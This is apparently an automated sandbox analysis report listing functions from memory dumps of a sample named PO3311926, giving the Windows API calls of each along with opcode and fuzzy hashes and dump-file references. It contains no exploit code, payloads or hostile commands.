                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 110b841676132a16971501170a1e4d421efccd984c7ad5eef41cc9e0675b5788
                                                                                              • Instruction ID: 58961cbef09d917539626f264cfbbf5ad95d2465170bd32395b1f1916008f966
                                                                                              • Opcode Fuzzy Hash: 110b841676132a16971501170a1e4d421efccd984c7ad5eef41cc9e0675b5788
                                                                                              • Instruction Fuzzy Hash: 53314B71908209AFCF55DF98C955AEEBBF6EF09300F1008A9F445A7251CB365E00CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BA73BC,?,?,?,00000000), ref: 00BA9DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00BA9E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: efd7e164f2620f9e8f926d69c230c449d402356c696a32edf7def955b9b84c89
                                                                                              • Instruction ID: 06e11e4b73059c6aeab303b02efcfdd679532279693abcba588864c9d13354b7
                                                                                              • Opcode Fuzzy Hash: efd7e164f2620f9e8f926d69c230c449d402356c696a32edf7def955b9b84c89
                                                                                              • Instruction Fuzzy Hash: 9921D03124D246ABC714CF34C891AABBBE8EF56704F0849ADF4C587142D329E94CAB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BA9F27,?,?,00BA771A), ref: 00BA96E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BA9F27,?,?,00BA771A), ref: 00BA9716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 04ca2e2ea3943e53ac4351a7a5dcfa195a3095ace14f5a4afa238d3f84d16715
                                                                                              • Instruction ID: 81e05c4dc2b04b9c145353f52fc4d7ca2978c0eb78781a5891eba0a7407cf0d6
                                                                                              • Opcode Fuzzy Hash: 04ca2e2ea3943e53ac4351a7a5dcfa195a3095ace14f5a4afa238d3f84d16715
                                                                                              • Instruction Fuzzy Hash: FC21C1711087446FE3308A69CC89FF7B7DCEF4A320F100A59F996C61D2C7B4A884A631
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BA9EC7
                                                                                              • GetLastError.KERNEL32 ref: 00BA9ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 1163f16645e6dc7d1d2f092ea38186604ada749e1b2757c877393092635a48f5
                                                                                              • Instruction ID: dccefb8f07ce48f6a8c82fbf756fa06168b52e024eb41402e1b27ce4901a1e5a
                                                                                              • Opcode Fuzzy Hash: 1163f16645e6dc7d1d2f092ea38186604ada749e1b2757c877393092635a48f5
                                                                                              • Instruction Fuzzy Hash: 6D11E571608700EBE724C628C880BA6B7E8EB46360F604AA9E152D2AD1E770ED4DD760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00BC8E75
                                                                                                • Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BE1098,00BA17CE,?,?,00000007,?,?,?,00BA13D6,?,00000000), ref: 00BC8EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: 9e3dee50dd1496824dbc773e989a9cd15f48046387e44e5770dd5db95b9eff9c
                                                                                              • Instruction ID: f734ea829de9fd1da52c91b4d2063911b6b061f64149564e4106542f3364f34f
                                                                                              • Opcode Fuzzy Hash: 9e3dee50dd1496824dbc773e989a9cd15f48046387e44e5770dd5db95b9eff9c
                                                                                              • Instruction Fuzzy Hash: 97F0963260511766DB212A29AC05FAF77D8CF82B70F2941EEF814A7191DF71DD0195B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00BB10AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00BB10B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 3d9730ea3cfd65e9b5310b0f832ec4fc4e5d14ed4af15064395b1a2cf8cae3bb
                                                                                              • Instruction ID: 484299caa767931f44435a0a5fb22c0158261980e4a4fbbe1dcbb965273774b4
                                                                                              • Opcode Fuzzy Hash: 3d9730ea3cfd65e9b5310b0f832ec4fc4e5d14ed4af15064395b1a2cf8cae3bb
                                                                                              • Instruction Fuzzy Hash: E7E0D832B00145A7CF0997B89C259FFB3EDEB4420479485B7E403D3101F9B0DE414660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA501
                                                                                                • Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 53a423124617f7a9dc7954586562cff3b10b535a9b5d11a15142aaa9b2788a6e
                                                                                              • Instruction ID: 736334d59ca9d475a478910cb962d68fcf6e53b30dcc30755cf6d55abe912885
                                                                                              • Opcode Fuzzy Hash: 53a423124617f7a9dc7954586562cff3b10b535a9b5d11a15142aaa9b2788a6e
                                                                                              • Instruction Fuzzy Hash: 07F0A0312001097BDF016F60DC41FDA3BECEB14785F848092B845D6161EB71CA94DA20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641,000000FF), ref: 00BAA1F1
                                                                                                • Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641), ref: 00BAA21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: d19b607bb9fe5bf337813349dc739aa0ef746889d8ee8266c598b99554f4f6cf
                                                                                              • Instruction ID: 836ea380e3d96217b635a28c02dfaf2a1ba8b6867ef448b434dfe9f1f9361bd8
                                                                                              • Opcode Fuzzy Hash: d19b607bb9fe5bf337813349dc739aa0ef746889d8ee8266c598b99554f4f6cf
                                                                                              • Instruction Fuzzy Hash: D4E092351442096BDB015F60DC85FED77DCEB09781F4840A1B945D2061EB61DE98DA61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00BD2641,000000FF), ref: 00BBACB0
                                                                                              • OleUninitialize.OLE32(?,?,?,?,00BD2641,000000FF), ref: 00BBACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 1e34fc6648dc011b2e97d9b833c70cd0c3cef6e121ada1007d059ff4bf4520d8
                                                                                              • Instruction ID: be6e9a5269181d3e1662c2dbcb87481201c85aae9c184b75d8412cbfa7a528e8
                                                                                              • Opcode Fuzzy Hash: 1e34fc6648dc011b2e97d9b833c70cd0c3cef6e121ada1007d059ff4bf4520d8
                                                                                              • Instruction Fuzzy Hash: 3FE03972604A90EBCB109B58DC46B49FBE8FB88B20F00426AA416937A0CB74A901CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00BAA23A,?,00BA755C,?,?,?,?), ref: 00BAA254
                                                                                                • Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BAA23A,?,00BA755C,?,?,?,?), ref: 00BAA280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: d54f104d69cf3f209cb9ead65fa811996561e6bbc7d5f13580f213fa7086f683
                                                                                              • Instruction ID: 3590c6f83284d126a901060ded548dd78b8dbc29a0d9efda81aaff53dad68f85
                                                                                              • Opcode Fuzzy Hash: d54f104d69cf3f209cb9ead65fa811996561e6bbc7d5f13580f213fa7086f683
                                                                                              • Instruction Fuzzy Hash: 1CE092315001246BCB50AB64CC05BE9BBD8EB0D7E1F0442A1FD55E3191DB70DE44CAA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00BBDEEC
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00BBDF03
                                                                                                • Part of subcall function 00BBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
                                                                                                • Part of subcall function 00BBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
                                                                                                • Part of subcall function 00BBB568: IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
                                                                                                • Part of subcall function 00BBB568: TranslateMessage.USER32(?), ref: 00BBB5AC
                                                                                                • Part of subcall function 00BBB568: DispatchMessageW.USER32(?), ref: 00BBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 0b8660682bef1c73ec13c9219c59b855dd6a48a9b56cb0cea994284a61622187
                                                                                              • Instruction ID: b39a6a932fbb1818e1eb64e3d7264a29a567d341a9a7e5ba8ad01f64c6884697
                                                                                              • Opcode Fuzzy Hash: 0b8660682bef1c73ec13c9219c59b855dd6a48a9b56cb0cea994284a61622187
                                                                                              • Instruction Fuzzy Hash: 45E09B7140428826DF11A764DC06FEE3BEC9B05785F040891B205DB1F3DAB4D6108661
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: 77b0e033a88dd57e4d9a7fce633f57feb41eb4bf12777db05680a9a4fbd84ab9
                                                                                              • Instruction ID: 1b86bd2a0febe746e011dffd19da384db57830b3b69fe237aaec55a34ede2a38
                                                                                              • Opcode Fuzzy Hash: 77b0e033a88dd57e4d9a7fce633f57feb41eb4bf12777db05680a9a4fbd84ab9
                                                                                              • Instruction Fuzzy Hash: 37E012764011186BDB11A7A4DC05FEA7BECFF09791F0400A57645D2005EAB4DA848BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BBA3DA
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BBA3E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 5a45544072efd1a3df8d0dcf86362f2efe2759cbee2d31c8b441d023e9029a20
                                                                                              • Instruction ID: 4b9d0fdba12477a0fb52e5b03353164c72c9e1353806390108d7f0c63c34f89b
                                                                                              • Opcode Fuzzy Hash: 5a45544072efd1a3df8d0dcf86362f2efe2759cbee2d31c8b441d023e9029a20
                                                                                              • Instruction Fuzzy Hash: AEE0ED71900218EBCB20DF55C5417E9BBE8EF04360F10849AA85693211E3B4AE44DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC2BAA
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BC2BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              • Opcode ID: a1bffcd7e0a5fa17c57419c2f9de19d9e5a42e4c99dbc681d999ac5b37a560f4
                                                                                              • Instruction ID: 8f9277643ac11203c3d696a4e700294b881ebbac8c8090cc316b25c76acdb69f
                                                                                              • Opcode Fuzzy Hash: a1bffcd7e0a5fa17c57419c2f9de19d9e5a42e4c99dbc681d999ac5b37a560f4
                                                                                              • Instruction Fuzzy Hash: 18D0223825430098AC147F742A0BF4933C9ED41F74BE082EEF4308A4C1EE109C80A011
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: f11acd719a5787cd8992936d810eb78b4d1a3b7f7280bb8be3a5015634cbc5c8
                                                                                              • Instruction ID: d5925a79b3bf909edf974a0b031815079384363706a3dc75157ed18cfd6d8603
                                                                                              • Opcode Fuzzy Hash: f11acd719a5787cd8992936d810eb78b4d1a3b7f7280bb8be3a5015634cbc5c8
                                                                                              • Instruction Fuzzy Hash: E0C0123225C280BECB010BB4DC09E2FBBACABA9312F06C908B0A5C0060C238C110DB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

